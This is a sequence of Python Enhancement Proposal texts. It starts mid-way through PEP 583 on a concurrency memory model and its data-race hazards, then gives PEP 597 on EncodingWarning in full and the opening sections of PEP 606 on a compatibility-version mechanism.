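t2.start()
t1.start()
t1.join()
t2.join()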
Surprising behaviors with races
Lots of strange things can happen when code has data races. It’s easy
to avoid all of these problems by just protecting shared variables
with locks. This is not a complete list of race hazards; it’s just a
collection of those that seem relevant to Python.
In all of these examples, variables starting with r are local
variables, and other variables are shared between threads.
Zombie values
This example comes from the Java memory model:
Initially p is q and p.x == 0.
Thread 1       Thread 2
r1 = p         r6 = p
r2 = r1.x      r6.x = 3
r3 = q
r4 = r3.x
r5 = r1.x
Can produce r2 == r5 == 0 but r4 == 3, proving that
p.x went from 0 to 3 and back to 0.
A good compiler would like to optimize out the redundant load of
p.x in initializing r5 by just re-using the value already
loaded into r2. We get the strange result if thread 1 sees memory
in this order:
Evaluation    Computes    Why
r1 = p
r2 = r1.x     r2 == 0
r3 = q        r3 is p
p.x = 3                   Side-effect of thread 2
r4 = r3.x     r4 == 3
r5 = r2       r5 == 0     Optimized from r5 = r1.x because r2 == r1.x.
Inconsistent Orderings
From N2177: Sequential Consistency for Atomics, and also known as
Independent Read of Independent Write (IRIW).
Initially, a == b == 0.
Thread 1    Thread 2    Thread 3    Thread 4
r1 = a      r3 = b      a = 1       b = 1
r2 = b      r4 = a
We may get r1 == r3 == 1 and r2 == r4 == 0, proving both
that a was written before b (thread 1’s data), and that
b was written before a (thread 2’s data). See Special
Relativity for a
real-world example.
This can happen if thread 1 and thread 3 are running on processors
that are close to each other, but far away from the processors that
threads 2 and 4 are running on and the writes are not being
transmitted all the way across the machine before becoming visible to
nearby threads.
Neither acquire/release semantics nor explicit memory barriers can
help with this. Making the orders consistent without locking requires
detailed knowledge of the architecture’s memory model, but Java
requires it for volatiles so we could use documentation aimed at its
implementers.
A happens-before race that’s not a sequentially-consistent race
From the POPL paper about the Java memory model [#JMM-popl].
Initially, x == y == 0.
Thread 1        Thread 2
r1 = x          r2 = y
if r1 != 0:     if r2 != 0:
    y = 42          x = 42
Can r1 == r2 == 42???
In a sequentially-consistent execution, there’s no way to get an
adjacent read and write to the same variable, so the program should be
considered correctly synchronized (albeit fragile), and should only
produce r1 == r2 == 0. However, the following execution is
happens-before consistent:
Statement      Value    Thread
r1 = x         42       1
if r1 != 0:    true     1
y = 42                  1
r2 = y         42       2
if r2 != 0:    true     2
x = 42                  2
WTF, you are asking yourself. Because there were no inter-thread
happens-before edges in the original program, the read of x in thread
1 can see any of the writes from thread 2, even if they only happened
because the read saw them. There are data races in the
happens-before model.
We don’t want to allow this, so the happens-before model isn’t enough
for Python. One rule we could add to happens-before that would
prevent this execution is:
If there are no data races in any sequentially-consistent
execution of a program, the program should have sequentially
consistent semantics.
Java gets this rule as a theorem, but Python may not want all of the
machinery you need to prove it.
Self-justifying values
Also from the POPL paper about the Java memory model [#JMM-popl].
Initially, x == y == 0.
Thread 1    Thread 2
r1 = x      r2 = y
y = r1      x = r2
Can x == y == 42???
In a sequentially consistent execution, no. In a happens-before
consistent execution, yes: The read of x in thread 1 is allowed to see
the value written in thread 2 because there are no happens-before
relations between the threads. This could happen if the compiler or
processor transforms the code into:
Thread 1        Thread 2
y = 42          r2 = y
r1 = x          x = r2
if r1 != 42:
    y = r1
It can produce a security hole if the speculated value is a secret
object, or points to the memory that an object used to occupy. Java
cares a lot about such security holes, but Python may not.
Uninitialized values (direct)
From several classic double-checked locking examples.
Initially, d == None.
Thread 1               Thread 2
while not d: pass      d = [3, 4]
assert d[1] == 4
This could raise an IndexError, fail the assertion, or, without
some care in the implementation, cause a crash or other undefined
behavior.
Thread 2 may actually be implemented as:
r1 = list()
r1.append(3)
r1.append(4)
d = r1
Because the assignment to d and the item assignments are independent,
the compiler and processor may optimize that to:
r1 = list()
d = r1
r1.append(3)
r1.append(4)
Which is obviously incorrect and explains the IndexError. If we then
look deeper into the implementation of r1.append(3), we may find
that it and d[1] cannot run concurrently without causing their own
race conditions. In CPython (without the GIL), those race conditions
would produce undefined behavior.
There’s also a subtle issue on the reading side that can cause the
value of d[1] to be out of date. Somewhere in the implementation of
list, it stores its contents as an array in memory. This array may
happen to be in thread 1’s cache. If thread 1’s processor reloads
d from main memory without reloading the memory that ought to
contain the values 3 and 4, it could see stale values instead. As far
as I know, this can only actually happen on Alphas and maybe Itaniums,
and we probably have to prevent it anyway to avoid crashes.
Uninitialized values (flag)
From several more double-checked locking examples.
Initially, d == dict() and initialized == False.
Thread 1                       Thread 2
while not initialized: pass    d['a'] = 3
r1 = d['a']                    initialized = True
r2 = r1 == 3
assert r2
This could raise a KeyError, fail the assertion, or, without some
care in the implementation, cause a crash or other undefined
behavior.
Because d and initialized are independent (except in the
programmer’s mind), the compiler and processor can rearrange these
almost arbitrarily, except that thread 1’s assertion has to stay after
the loop.
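The intended behaviour is easy to get by turning the flag into a real synchronization action; a sketch using threading.Event (writer and reader are illustrative names):
import threading

d = {}
initialized = threading.Event()

def writer():
    d['a'] = 3
    initialized.set()     # a release: publishes the write to d

def reader():
    initialized.wait()    # an acquire: happens after the set()
    assert d['a'] == 3    # guaranteed to see the value; no KeyError

t_reader = threading.Thread(target=reader)
t_writer = threading.Thread(target=writer)
t_reader.start()
t_writer.start()
t_writer.join()
t_reader.join()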
Inconsistent guarantees from relying on data dependencies
This is a problem with Java final variables and the proposed
data-dependency ordering in C++0x.
First execute:

g = []
def Init():
    g.extend([1,2,3])
    return [1,2,3]
h = None
Then in two threads:
Thread 1               Thread 2
while not h: pass      r1 = Init()
assert h == [1,2,3]    freeze(r1)
assert h == g          h = r1
If h has semantics similar to a Java final variable (except
for being write-once), then even though the first assertion is
guaranteed to succeed, the second could fail.
Data-dependent guarantees like those final provides only work if
the access is through the final variable. It’s not even safe to
access the same object through a different route. Unfortunately,
because of how processors work, final’s guarantees are only cheap when
they’re weak.
The rules for Python
The first rule is that Python interpreters can’t crash due to race
conditions in user code. For CPython, this means that race conditions
can’t make it down into C. For Jython, it means that
NullPointerExceptions can’t escape the interpreter.
Presumably we also want a model at least as strong as happens-before
consistency because it lets us write a simple description of how
concurrent queues and thread launching and joining work.
Other rules are more debatable, so I’ll present each one with pros and
cons.
Data-race-free programs are sequentially consistent
We’d like programmers to be able to reason about their programs as if
they were sequentially consistent. Since it’s hard to tell whether
you’ve written a happens-before race, we only want to require
programmers to prevent sequential races. The Java model does this
through a complicated definition of causality, but if we don’t want to
include that, we can just assert this property directly.
No security holes from out-of-thin-air reads
If the program produces a self-justifying value, it could expose
access to an object that the user would rather the program not see.
Again, Java’s model handles this with the causality definition. We
might be able to prevent these security problems by banning
speculative writes to shared variables, but I don’t have a proof of
that, and Python may not need those security guarantees anyway.
Restrict reorderings instead of defining happens-before
The .NET [#CLR-msdn] and x86 [#x86-model] memory models are based on
defining which reorderings compilers may allow. I think that it’s
easier to program to a happens-before model than to reason about all
of the possible reorderings of a program, and it’s easier to insert
enough happens-before edges to make a program correct, than to insert
enough memory fences to do the same thing. So, although we could
layer some reordering restrictions on top of the happens-before base,
I don’t think Python’s memory model should be entirely reordering
restrictions.
Atomic, unordered assignments
Assignments of primitive types are already atomic. If you assign
3<<72 + 5 to a variable, no thread can see only part of the value.
Jeremy Manson suggested that we extend this to all objects. This
allows compilers to reorder operations to optimize them, without
allowing some of the more confusing uninitialized values. The
basic idea here is that when you assign a shared variable, readers
can’t see any changes made to the new value before the assignment, or
to the old value after the assignment. So, if we have a program like:
Initially, (d.a, d.b) == (1, 2), and (e.c, e.d) == (3, 4).
We also have class Obj(object): pass.
Thread 1      Thread 2
r1 = Obj()    r3 = d
r1.a = 3      r4, r5 = r3.a, r3.b
r1.b = 4      r6 = e
d = r1        r7, r8 = r6.c, r6.d
r2 = Obj()
r2.c = 6
r2.d = 7
e = r2
(r4, r5) can be (1, 2) or (3, 4) but nothing else, and
(r7, r8) can be either (3, 4) or (6, 7) but nothing
else. Unlike if writes were releases and reads were acquires,
it’s legal for thread 2 to see (e.c, e.d) == (6, 7) and (d.a,
d.b) == (1, 2) (out of order).
This allows the compiler a lot of flexibility to optimize without
allowing users to see some strange values. However, because it relies
on data dependencies, it introduces some surprises of its own. For
example, the compiler could freely optimize the above example to:
Thread 1      Thread 2
r1 = Obj()    r3 = d
r2 = Obj()    r6 = e
r1.a = 3      r4, r7 = r3.a, r6.c
r2.c = 6      r5, r8 = r3.b, r6.d
r2.d = 7
e = r2
r1.b = 4
d = r1
As long as it didn’t let the initialization of e move above any of
the initializations of members of r2, and similarly for d and
r1.
This also helps to ground happens-before consistency. To see the
problem, imagine that the user unsafely publishes a reference to an
object as soon as she gets it. The model needs to constrain what
values can be read through that reference. Java says that every field
is initialized to 0 before anyone sees the object for the first time,
but Python would have trouble defining “every field”. If instead we
say that assignments to shared variables have to see a value at least
as up to date as when the assignment happened, then we don’t run into
any trouble with early publication.
Two tiers of guarantees
Most other languages with any guarantees for unlocked variables
distinguish between ordinary variables and volatile/atomic variables.
They provide many more guarantees for the volatile ones. Python can’t
easily do this because we don’t declare variables. This may or may
not matter, since Python locks aren’t significantly more expensive
than ordinary Python code. If we want to get those tiers back, we could:
Introduce a set of atomic types similar to Java’s [5]
or C++’s [6]. Unfortunately, we couldn’t assign to
them with =.
Without requiring variable declarations, we could also specify that
all of the fields on a given object are atomic.
Extend the __slots__ mechanism [7] with a parallel
__volatiles__ list, and maybe a __finals__ list.
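The last of these options is purely hypothetical; as an illustrative sketch only,
a class might declare which of its slots need the stronger guarantees (the
__volatiles__ and __finals__ names are invented here and exist in no Python
implementation):

class SharedPoint(object):
    # Ordinary slots would keep the weak, unordered-assignment guarantees.
    __slots__ = ('x', 'y', 'dirty')
    # Hypothetical parallel lists naming slots that would behave like
    # volatile (acquire/release ordering) or final (safe publication
    # after construction) fields.
    __volatiles__ = ('dirty',)
    __finals__ = ('x', 'y')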
Sequential Consistency
We could just adopt sequential consistency for Python.
This avoids all of the hazards mentioned above,
but it prohibits lots of optimizations too.
As far as I know, this is the current model of CPython,
but if CPython learned to optimize out some variable reads,
it would lose this property.
If we adopt this, Jython’s dict implementation may no longer be
able to use ConcurrentHashMap because that only promises to create
appropriate happens-before edges, not to be sequentially consistent
(although maybe the fact that Java volatiles are totally ordered
carries over). Both Jython and IronPython would probably need to use
AtomicReferenceArray
or the equivalent for any __slots__ arrays.
Adapt the x86 model
The x86 model is:
Loads are not reordered with other loads.
Stores are not reordered with other stores.
Stores are not reordered with older loads.
Loads may be reordered with older stores to different locations but
not with older stores to the same location.
In a multiprocessor system, memory ordering obeys causality (memory
ordering respects transitive visibility).
In a multiprocessor system, stores to the same location have a
total order.
In a multiprocessor system, locked instructions have a total order.
Loads and stores are not reordered with locked instructions.
In acquire/release terminology, this appears to say that every store
is a release and every load is an acquire. This is slightly weaker
than sequential consistency, in that it allows inconsistent
orderings, but it disallows zombie values and the compiler
optimizations that produce them. We would probably want to weaken the
model somehow to explicitly allow compilers to eliminate redundant
variable reads. The x86 model may also be expensive to implement on
other platforms, although because x86 is so common, that may not
matter much.
Upgrading or downgrading to an alternate model
We can adopt an initial memory model without totally restricting
future implementations. If we start with a weak model and want to get
stronger later, we would only have to change the implementations, not
programs. Individual implementations could also guarantee a stronger
memory model than the language demands, although that could hurt
interoperability. On the other hand, if we start with a strong model
and want to weaken it later, we can add a from __future__ import
weak_memory statement to declare that some modules are safe.
Implementation Details
The required model is weaker than any particular implementation. This
section tries to document the actual guarantees each implementation
provides, and should be updated as the implementations change.
CPython
Uses the GIL to guarantee that other threads don’t see funny
reorderings, and does few enough optimizations that I believe it’s
actually sequentially consistent at the bytecode level. Threads can
switch between any two bytecodes (instead of only between statements),
so two threads that concurrently execute:
i = i + 1
with i initially 0 could easily end up with i==1 instead
of the expected i==2. If they execute:
i += 1
instead, CPython 2.6 will always give the right answer, but it’s easy
to imagine another implementation in which this statement won’t be
atomic.
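A quick way to see why these switches matter is to look at the bytecode; this is
only an illustrative sketch, and the exact opcodes vary between CPython versions:

import dis

# The statement compiles to separate load, add, and store instructions.
# CPython may switch threads between any two of them, so two threads that
# both load i == 0 will both store i == 1, losing one increment.
dis.dis(compile("i = i + 1", "<example>", "exec"))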
PyPy
Also uses a GIL, but probably does enough optimization to violate
sequential consistency. I know very little about this implementation.
Jython
Provides true concurrency under the Java memory model and stores
all object fields (except for those in __slots__?) in a
ConcurrentHashMap,
which provides fairly strong ordering guarantees. Local variables in
a function may have fewer guarantees, which would become visible if
they were captured into a closure that was then passed to another
thread.
IronPython
Provides true concurrency under the CLR memory model, which probably
protects it from uninitialized values. IronPython uses a locked
map to store object fields, providing at least as many guarantees as
Jython.
References
[1]
The Java Memory Model, by Jeremy Manson, Bill Pugh, and
Sarita Adve
(http://www.cs.umd.edu/users/jmanson/java/journal.pdf). This paper
is an excellent introduction to memory models in general and has
lots of examples of compiler/processor optimizations and the
strange program behaviors they can produce.
[2]
N2480: A Less Formal Explanation of the
Proposed C++ Concurrency Memory Model, Hans Boehm
(http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2480.html)
[3]
Memory Models: Understand the Impact of Low-Lock
Techniques in Multithreaded Apps, Vance Morrison
(http://msdn2.microsoft.com/en-us/magazine/cc163715.aspx)
[4]
Intel(R) 64 Architecture Memory Ordering White Paper
(http://www.intel.com/products/processor/manuals/318147.pdf)
[5]
Package java.util.concurrent.atomic
(http://java.sun.com/javase/6/docs/api/java/util/concurrent/atomic/package-summary.html)
[6]
C++ Atomic Types and Operations, Hans Boehm and
Lawrence Crowl
(http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2427.html)
[7]
__slots__ (http://docs.python.org/ref/slots.html)
[8]
Alternatives to SC, a thread on the cpp-threads mailing list,
which includes lots of good examples.
(http://www.decadentplace.org.uk/pipermail/cpp-threads/2007-January/001287.html)
[9]
python-safethread, a patch by Adam Olsen for CPython
that removes the GIL and statically guarantees that all objects
shared between threads are consistently
locked. (http://code.google.com/p/python-safethread/)
Acknowledgements
Thanks to Jeremy Manson and Alex Martelli for detailed discussions on
what this PEP should look like.
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 583 – A Concurrency Memory Model for Python | Informational | This PEP describes how Python programs may behave in the presence of
concurrent reads and writes to shared variables from multiple threads.
We use a happens before relation to define when variable accesses
are ordered or concurrent. Nearly all programs should simply use locks
to guard their shared variables, and this PEP highlights some of the
strange things that can happen when they don’t, but programmers often
assume that it’s ok to do “simple” things without locking, and it’s
somewhat unpythonic to let the language surprise them. Unfortunately,
avoiding surprise often conflicts with making Python run quickly, so
this PEP tries to find a good tradeoff between the two. |
PEP 597 – Add optional EncodingWarning
Author:
Inada Naoki <songofacandy at gmail.com>
Status:
Final
Type:
Standards Track
Created:
05-Jun-2019
Python-Version:
3.10
Table of Contents
Abstract
Motivation
Using the default encoding is a common mistake
Explicit way to use locale-specific encoding
Prepare to change the default encoding to UTF-8
Specification
EncodingWarning
Options to enable the warning
encoding="locale"
io.text_encoding()
Affected standard library modules
Rationale
Opt-in warning
“locale” is not a codec alias
Backward Compatibility
Forward Compatibility
How to Teach This
For new users
For experienced users
Reference Implementation
Discussions
References
Copyright
Abstract
Add a new warning category EncodingWarning. It is emitted when the
encoding argument to open() is omitted and the default
locale-specific encoding is used.
The warning is disabled by default. A new -X warn_default_encoding
command-line option and a new PYTHONWARNDEFAULTENCODING environment
variable can be used to enable it.
A "locale" argument value for encoding is added too. It
explicitly specifies that the locale encoding should be used, silencing
the warning.
Motivation
Using the default encoding is a common mistake
Developers using macOS or Linux may forget that the default encoding
is not always UTF-8.
For example, using long_description = open("README.md").read() in
setup.py is a common mistake. Many Windows users cannot install
such packages if there is at least one non-ASCII character
(e.g. emoji, author names, copyright symbols, and the like)
in their UTF-8-encoded README.md file.
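A minimal sketch of the mistake and of the portable fix, assuming the project ships
a UTF-8 encoded README.md:

# Relies on the locale encoding; breaks on Windows for non-ASCII content.
long_description = open("README.md").read()

# Portable: always decode the file as UTF-8.
long_description = open("README.md", encoding="utf-8").read()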
Of the 4000 most downloaded packages from PyPI, 489 use non-ASCII
characters in their README, and 82 fail to install from source on
non-UTF-8 locales due to not specifying an encoding for a non-ASCII
file. [1]
Another example is logging.basicConfig(filename="log.txt").
Some users might expect it to use UTF-8 by default, but the locale
encoding is actually what is used. [2]
Even Python experts may assume that the default encoding is UTF-8.
This creates bugs that only happen on Windows; see [3], [4], [5],
and [6] for example.
Emitting a warning when the encoding argument is omitted will help
find such mistakes.
Explicit way to use locale-specific encoding
open(filename) isn’t explicit about which encoding is expected:
If ASCII is assumed, this isn’t a bug, but may result in decreased
performance on Windows, particularly with non-Latin-1 locale encodings
If UTF-8 is assumed, this may be a bug or a platform-specific script
If the locale encoding is assumed, the behavior is as expected
(but could change if future versions of Python modify the default)
From this point of view, open(filename) is not readable code.
encoding=locale.getpreferredencoding(False) can be used to
specify the locale encoding explicitly, but it is too long and easy
to misuse (e.g. one can forget to pass False as its argument).
This PEP provides an explicit way to specify the locale encoding.
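For illustration only (the file name is arbitrary), the current verbose spelling and
the explicit spelling added by this PEP look like this:

import locale

# Today's explicit but verbose spelling; forgetting False is a common misuse.
with open("notes.txt", "w", encoding=locale.getpreferredencoding(False)) as f:
    f.write("hello")

# The explicit spelling added by this PEP (Python 3.10 and later).
with open("notes.txt", "w", encoding="locale") as f:
    f.write("hello")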
Prepare to change the default encoding to UTF-8
Since UTF-8 has become the de-facto standard text encoding,
we might default to it for opening files in the future.
However, such a change will affect many applications and libraries.
If we start emitting DeprecationWarning everywhere the encoding
argument is omitted, it will be too noisy and painful.
Although this PEP doesn’t propose changing the default encoding,
it will help enable that change by:
Reducing the number of omitted encoding arguments in libraries
before we start emitting a DeprecationWarning by default.
Allowing users to pass encoding="locale" to suppress
the current warning and any DeprecationWarning added in the future,
as well as retaining consistent behavior if later Python versions
change the default, ensuring support for any Python version >=3.10.
Specification
EncodingWarning
Add a new EncodingWarning warning class as a subclass of
Warning. It is emitted when the encoding argument is omitted and
the default locale-specific encoding is used.
Options to enable the warning
The -X warn_default_encoding option and the
PYTHONWARNDEFAULTENCODING environment variable are added. They
are used to enable EncodingWarning.
sys.flags.warn_default_encoding is also added. The flag is true when
EncodingWarning is enabled.
When the flag is set, io.TextIOWrapper(), open() and other
modules using them will emit EncodingWarning when the encoding
argument is omitted.
Since EncodingWarning is a subclass of Warning, they are
shown by default (if the warn_default_encoding flag is set), unlike
DeprecationWarning.
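A small sketch of the behavior on Python 3.10 and later; the file name is only
illustrative:

# Run as:   python -X warn_default_encoding example.py
# or with:  PYTHONWARNDEFAULTENCODING=1 python example.py
import sys

print(sys.flags.warn_default_encoding)   # 1 when the option is enabled
with open("example.txt", "w") as f:      # emits EncodingWarning when enabled
    f.write("hello")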
encoding="locale"
io.TextIOWrapper will accept "locale" as a valid argument to
encoding. It has the same meaning as the current encoding=None,
except that io.TextIOWrapper doesn’t emit EncodingWarning when
encoding="locale" is specified.
io.text_encoding()
io.text_encoding() is a helper for functions with an
encoding=None parameter that pass it to io.TextIOWrapper() or
open().
A pure Python implementation will look like this:
def text_encoding(encoding, stacklevel=1):
    """A helper function to choose the text encoding.

    When *encoding* is not None, just return it.
    Otherwise, return the default text encoding (i.e. "locale").

    This function emits an EncodingWarning if *encoding* is None and
    sys.flags.warn_default_encoding is true.

    This function can be used in APIs with an encoding=None parameter
    that pass it to TextIOWrapper or open.
    However, please consider using encoding="utf-8" for new APIs.
    """
    if encoding is None:
        if sys.flags.warn_default_encoding:
            import warnings
            warnings.warn(
                "'encoding' argument not specified.",
                EncodingWarning, stacklevel + 2)
        encoding = "locale"
    return encoding
For example, pathlib.Path.read_text() can use it like this:
def read_text(self, encoding=None, errors=None):
    encoding = io.text_encoding(encoding)
    with self.open(mode='r', encoding=encoding, errors=errors) as f:
        return f.read()
By using io.text_encoding(), EncodingWarning is emitted for
the caller of read_text() instead of read_text() itself.
Affected standard library modules
Many standard library modules will be affected by this change.
Most APIs accepting encoding=None will use io.text_encoding()
as written in the previous section.
Where using the locale encoding as the default encoding is reasonable,
encoding="locale" will be used instead. For example,
the subprocess module will use the locale encoding as the default
for pipes.
Many tests use open() without encoding specified to read
ASCII text files. They should be rewritten with encoding="ascii".
Rationale
Opt-in warning
Although DeprecationWarning is suppressed by default, always
emitting DeprecationWarning when the encoding argument is
omitted would be too noisy.
Noisy warnings may lead developers to dismiss the
DeprecationWarning.
“locale” is not a codec alias
We don’t add “locale” as a codec alias because the locale can be
changed at runtime.
Additionally, TextIOWrapper checks os.device_encoding()
when encoding=None. This behavior cannot be implemented in
a codec.
Backward Compatibility
The new warning is not emitted by default, so this PEP is 100%
backwards-compatible.
Forward Compatibility
Passing "locale" as the argument to encoding is not
forward-compatible. Code using it will not work on Python older than
3.10, and will instead raise LookupError: unknown encoding: locale.
Until developers can drop Python 3.9 support, EncodingWarning
can only be used for finding missing encoding="utf-8" arguments.
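One possible way to cope with this, sketched here only as a suggestion, is to pass
"locale" conditionally so that the code still runs on Python 3.9 and older:

import sys

# "locale" is only understood by open() on Python 3.10 and later; on older
# versions, omitting the encoding argument gives the same behavior.
kwargs = {"encoding": "locale"} if sys.version_info >= (3, 10) else {}
with open("data.txt", "w", **kwargs) as f:
    f.write("hello")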
How to Teach This
For new users
Since EncodingWarning is used to write cross-platform code,
there is no need to teach it to new users.
We can just recommend using UTF-8 for text files and using
encoding="utf-8" when opening them.
For experienced users
Using open(filename) to read text files encoded in UTF-8 is a
common mistake. It may not work on Windows because UTF-8 is not the
default encoding.
You can use -X warn_default_encoding or
PYTHONWARNDEFAULTENCODING=1 to find this type of mistake.
Omitting the encoding argument is not a bug when opening text files
encoded in the locale encoding, but encoding="locale" is recommended
in Python 3.10 and later because it is more explicit.
Reference Implementation
https://github.com/python/cpython/pull/19481
Discussions
The latest discussion thread is:
https://mail.python.org/archives/list/[email protected]/thread/SFYUP2TWD5JZ5KDLVSTZ44GWKVY4YNCV/
Why not implement this in linters?
encoding="locale" and io.text_encoding() must be implemented
in Python.
It is difficult to find all callers of functions wrapping
open() or TextIOWrapper() (see the io.text_encoding()
section).
Many developers will not use the option.
Some will, and report the warnings to libraries they use,
so the option is worth it even if many developers don’t enable it.
For example, I found [7] and [8] by running
pip install -U pip, and [9] by running tox
with the reference implementation. This demonstrates how this
option can be used to find potential issues.
References
[1]
“Packages can’t be installed when encoding is not UTF-8”
(https://github.com/methane/pep597-pypi-ascii)
[2]
“Logging - Inconsistent behaviour when handling unicode”
(https://bugs.python.org/issue37111)
[3]
Packaging tutorial in packaging.python.org didn’t specify
encoding to read a README.md
(https://github.com/pypa/packaging.python.org/pull/682)
[4]
json.tool had used locale encoding to read JSON files.
(https://bugs.python.org/issue33684)
[5]
site: Potential UnicodeDecodeError when handling pth file
(https://bugs.python.org/issue33684)
[6]
pypa/pip: “Installing packages fails if Python 3 installed
into path with non-ASCII characters”
(https://github.com/pypa/pip/issues/9054)
[7]
“site: Potential UnicodeDecodeError when handling pth file”
(https://bugs.python.org/issue43214)
[8]
“[pypa/pip] Use encoding option or binary mode for open()”
(https://github.com/pypa/pip/pull/9608)
[9]
“Possible UnicodeError caused by missing encoding="utf-8"”
(https://github.com/tox-dev/tox/issues/1908)
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Final | PEP 597 – Add optional EncodingWarning | Standards Track | Add a new warning category EncodingWarning. It is emitted when the
encoding argument to open() is omitted and the default
locale-specific encoding is used. |
PEP 606 – Python Compatibility Version
Author:
Victor Stinner <vstinner at python.org>
Status:
Rejected
Type:
Standards Track
Created:
18-Oct-2019
Python-Version:
3.9
Table of Contents
Abstract
Rationale
The need to evolve frequently
Partial compatibility to minimize the Python maintenance burden
Cases excluded from backward compatibility
Upgrading a project to a newer Python
Cleaning up Python and DeprecationWarning
Redistribute the maintenance burden
Examples of backward compatibility
collections ABC aliases
Deprecated open() “U” mode
Specification
sys functions
Command line
Backwards Compatibility
Security Implications
Alternatives
Provide a workaround for each incompatible change
Handle backward compatibility in the parser
from __future__ import python38_syntax
Update cache_tag
Temporary moratorium on incompatible changes
PEP 387
PEP 497
Examples of incompatible changes
Python 3.8
Python 3.7
Micro releases
References
Copyright
Abstract
Add sys.set_python_compat_version(version) to enable partial
compatibility with requested Python version. Add
sys.get_python_compat_version().
Modify a few functions in the standard library to implement partial
compatibility with Python 3.8.
Add sys.set_python_min_compat_version(version) to deny backward
compatibility with Python versions older than version.
Add -X compat_version=VERSION and -X min_compat_version=VERSION
command line options. Add PYTHONCOMPATVERSION and
PYTHONCOMPATMINVERSION environment variables.
Rationale
The need to evolve frequently
To remain relevant and useful, Python has to evolve frequently; some
enhancements require incompatible changes. Any incompatible change can
break an unknown number of Python projects. That risk can lead developers
to decide not to implement a feature at all.
Users want to get the latest Python version to obtain new features and
better performance. A few incompatible changes can prevent them from using their
applications on the latest Python version.
This PEP proposes to add a partial compatibility with old Python
versions as a tradeoff to fit both use cases.
The main issue with the migration from Python 2 to Python 3 is not that
Python 3 is backward incompatible, but how incompatible changes were
introduced.
Partial compatibility to minimize the Python maintenance burden
While technically it would be possible to provide full compatibility
with old Python versions, this PEP proposes to minimize the number of
functions handling backward compatibility to reduce the maintenance
burden of the Python project (CPython).
Each change introducing backward compatibility to a function should be
properly discussed to estimate the maintenance cost in the long-term.
Backward compatibility code will be dropped on each Python release, on a
case-by-case basis. Each compatibility function can be supported for a
different number of Python releases depending on its maintenance cost
and the estimated risk (number of broken projects) if it’s removed.
The maintenance cost does not only come from the code implementing the
backward compatibility, but also comes from the additional tests.
Cases excluded from backward compatibility
The performance overhead of any compatibility code must be low when
sys.set_python_compat_version() is not called.
The C API is out of the scope of this PEP: Py_LIMITED_API macro and
the stable ABI are solving this problem differently, see the PEP 384:
Defining a Stable ABI.
Security fixes which break backward compatibility on purpose will
not get a compatibility layer; security matters more than compatibility.
For example, http.client.HTTPSConnection was modified in Python
3.4.3 to perform all the necessary certificate and hostname checks by
default. It was a deliberate change motivated by PEP 476: Enabling
certificate verification by default for stdlib http clients (bpo-22417).
The Python language does not provide backward compatibility.
Changes which are not clearly incompatible are not covered by this PEP.
For example, Python 3.9 changed the default protocol in the pickle
module to Protocol 4 which was first introduced in Python 3.4. This
change is backward compatible up to Python 3.4. There is no need to use
the Protocol 3 by default when compatibility with Python 3.8 is
requested.
The new DeprecationWarning and PendingDeprecationWarning warnings
in Python 3.9 will not be disabled in Python 3.8 compatibility mode.
If a project runs its test suite using -Werror (treat any warning as
an error), these warnings must be fixed, or specific deprecation
warnings must be ignored on a case-by-case basis.
Upgrading a project to a newer Python
Without backward compatibility, all incompatible changes must be fixed
at once, which can be a blocker issue. It is even worse when a project
is upgraded to a newer Python which is separated by multiple releases
from the old Python.
Postponing an upgrade only makes things worse: each skipped release adds
more incompatible changes. The technical debt only steadily
increases over time.
With backward compatibility, it becomes possible to upgrade Python
incrementally in a project, without having to fix all of the issues at once.
The “all-or-nothing” approach is a showstopper for porting large Python 2 code bases
to Python 3. The list of incompatible changes between Python 2 and
Python 3 is long, and it’s getting longer with each Python 3.x release.
Cleaning up Python and DeprecationWarning
One of the mottos of the Zen of Python (PEP 20) is:
There should be one– and preferably only one –obvious way to do
it.
When Python evolves, new ways inevitably emerge. DeprecationWarnings
are emitted to suggest using the new way, but many developers ignore
these warnings, which are silent by default (except in the __main__
module: see the PEP 565).
Some developers simply ignore all warnings when there are too many of
them, and only deal with the resulting exceptions once the deprecated code
is removed.
Sometimes, supporting both ways has a minor maintenance cost, but
developers prefer to drop the old way to clean up their code. These kinds of
changes are backward incompatible.
Some developers can take the end of the Python 2 support as an
opportunity to push even more incompatible changes than usual.
Adding an opt-in backward compatibility prevents the breaking of
applications and allows developers to continue doing these cleanups.
Redistribute the maintenance burden
The backward compatibility involves authors of incompatible
changes more in the upgrade path.
Examples of backward compatibility
collections ABC aliases
collections.abc aliases to ABC classes have been removed from the
collections module in Python 3.9, after being deprecated since
Python 3.3. For example, collections.Mapping no longer exists.
In Python 3.6, aliases were created in collections/__init__.py by
from _collections_abc import *.
In Python 3.7, a __getattr__() has been added to the collections
module to emit a DeprecationWarning upon first access to an
attribute:
def __getattr__(name):
    # For backwards compatibility, continue to make the collections ABCs
    # through Python 3.6 available through the collections module.
    # Note: no new collections ABCs were added in Python 3.7
    if name in _collections_abc.__all__:
        obj = getattr(_collections_abc, name)
        import warnings
        warnings.warn("Using or importing the ABCs from 'collections' instead "
                      "of from 'collections.abc' is deprecated since Python 3.3, "
                      "and in 3.9 it will be removed.",
                      DeprecationWarning, stacklevel=2)
        globals()[name] = obj
        return obj
    raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
Compatibility with Python 3.8 can be restored in Python 3.9 by adding
back the __getattr__() function, but only when backward
compatibility is requested:
def __getattr__(name):
    if (sys.get_python_compat_version() < (3, 9)
            and name in _collections_abc.__all__):
        ...
    raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
Deprecated open() “U” mode
The "U" mode of open() is deprecated since Python 3.4 and emits a
DeprecationWarning. bpo-37330 proposes to drop this mode:
open(filename, "rU") would raise an exception.
This change falls into the “cleanup” category: it is not required to
implement a feature.
A backward compatibility mode would be trivial to implement and would be
welcomed by users.
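A hypothetical sketch of what that compatibility mode would look like with the API
proposed in this PEP, assuming a future Python that has already removed the "U" mode:

import sys

# Proposed API: request partial compatibility with Python 3.8.
sys.set_python_compat_version((3, 8))

# Without the call above, a Python that has dropped the "U" mode would
# raise an exception here; with it, the old behaviour is restored.
with open("notes.txt", "rU") as f:
    data = f.read()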
Specification
sys functions
Add 3 functions to the sys module:
sys.set_python_compat_version(version): set the Python
compatibility version. If it has been called previously, use the
minimum of requested versions. Raise an exception if
sys.set_python_min_compat_version(min_version) has been called and
version < min_version.
version must be greater than or equal to (3, 0).
sys.set_python_min_compat_version(min_version): set the
minimum compatibility version. Raise an exception if
sys.set_python_compat_version(old_version) has been called
previously and old_version < min_version.
